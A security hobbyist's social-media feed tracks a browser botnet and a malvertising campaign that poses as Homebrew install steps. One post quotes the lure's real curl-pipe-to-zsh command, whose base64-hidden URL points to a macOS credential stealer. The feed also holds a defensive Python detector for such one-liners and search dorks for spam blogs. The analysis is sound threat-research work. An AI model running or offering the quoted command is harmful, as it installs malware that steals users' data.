143 Followers
206 Following
197 Posts

Developer at a cybersecurity startup.

Infosec hobbyist, hope that one day I'll actually be able to contribute.

Rarely complete projects (ask me about my honeypot, or pippin)

Twitter: https://twitter.com/fauxeccles
GH: https://github.com/faux-eccles
pronouns: he/him

In case anyone was wondering, #mellowtel still seems to be processing requests. Whether it's still via the browser botnet I'm not sure, but I assume so.

Some queries I've noted,

- circumventing query restrictions for searching government business dbs
- loading Instagram pages
- using the perplexity API for determining product recommendations for various questions
- performing Google searches and extracting the AI result

https://arstechnica.com/security/2025/07/browser-extensions-turn-nearly-1-million-browsers-into-website-scraping-bots/

Seems like slab has been used a bit here and there for this campaign using various compromised ads accounts
https://adstransparency.google.com/?region=anywhere&platform=SEARCH&query=Homebrew+for+Mac&domain=slab.com

Huge amount of different ads accounts, all following similar approaches, oldest ad might be March 22nd

Interesting addendum about the advertiser https://adstransparency.google.com/advertiser/AR08935176312499208193?origin=ata&region=anywhere

I suspect it could be a compromised ads account, that being said I can't actually find this ad listed in the transparency page

Absolute state of google, (and frankly the expectations of developers for installing things).

Setting up an older Mac to use as a new work machine, search google for brew Mac looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.

First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". *Don't actually do this*

echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh
Aww man that base64 makes me feel good and trusting, wonder what's inside

echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/

Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1

This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74

Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed

#osx #malware #stealer #google #brew
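Added here as a defender's triage example (my code, not from the post or any project it mentions): a small helper that pulls a base64-hidden URL out of a curl-pipe-shell one-liner shaped like the one above and flags when the hidden host differs from the one the lure displays. The sample command and every domain in it are constructed placeholders, not the campaign's real values.

```python
"""Triage helper for curl-pipe-shell one-liners that hide the real URL in base64."""
import base64
import binascii
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# `echo "<base64>" | base64 -d` (or -D / --decode) as a stage inside the command
B64_STAGE_RE = re.compile(
    r"""echo\s+['"]?([A-Za-z0-9+/]{16,}={0,2})['"]?\s*\|\s*base64\s+(?:-d|-D|--decode)\b"""
)
URL_RE = re.compile(r"https?://[^\s\"'<>()]+")
# Pipeline whose final stage is a shell interpreter (sh, bash, zsh, ksh, dash)
TAIL_SHELL_RE = re.compile(r"\|\s*(?:ba|z|k|da)?sh\b[^|]*$")


@dataclass
class Finding:
    pipes_download_to_shell: bool                              # curl/wget output ends in a shell
    displayed_hosts: list[str] = field(default_factory=list)   # hosts visible in clear text
    decoded_urls: list[str] = field(default_factory=list)      # URLs recovered from base64
    host_mismatch: bool = False                                # hidden host != displayed host


def analyse_one_liner(cmd: str) -> Finding:
    downloads = re.search(r"\b(?:curl|wget)\b", cmd) is not None
    finding = Finding(pipes_download_to_shell=downloads and TAIL_SHELL_RE.search(cmd) is not None)
    finding.displayed_hosts = sorted(
        {urlparse(u).hostname for u in URL_RE.findall(cmd) if urlparse(u).hostname}
    )
    for token in B64_STAGE_RE.findall(cmd):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8", "replace")
        except binascii.Error:
            continue  # not valid base64, leave it alone
        finding.decoded_urls.extend(URL_RE.findall(text))
    hidden_hosts = {urlparse(u).hostname for u in finding.decoded_urls}
    finding.host_mismatch = bool(hidden_hosts - set(finding.displayed_hosts))
    return finding


# Constructed sample mirroring the lure's shape; domains are placeholders, not the real ones
HIDDEN_URL = "https://loader.example.invalid/debug/loader.sh?build=PLACEHOLDER"
SAMPLE_CMD = (
    'echo "Downloading Update: https://support.example/xprotect.dmg" && '
    f'curl -s $(echo "{base64.b64encode(HIDDEN_URL.encode()).decode()}" | base64 -d) | zsh'
)

if __name__ == "__main__":
    print(analyse_one_liner(SAMPLE_CMD))
```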

Oh yeah forgot to give details on the blog. Using the Google dork `site:itch.io inurl:/blog "alerdine"` you can find around 20 pages all published on the same day (16/01/2026), and using the same format, which feels very Sloppy™️.

Sadly the AI generated nature of it makes each post slightly different, making it difficult to see if there are similar posts under different accounts. I was able to find some using the search `site:itch.io inurl:/blog "Compatibility Component Supported Notes Windows 10 ✅ Recommend`, which surfaced a few but is probably not comprehensive.

A few of the listings appear to have been removed but Google has 10 pages of results.

Didn't really feel homesick in the US but now I'm here I do miss this place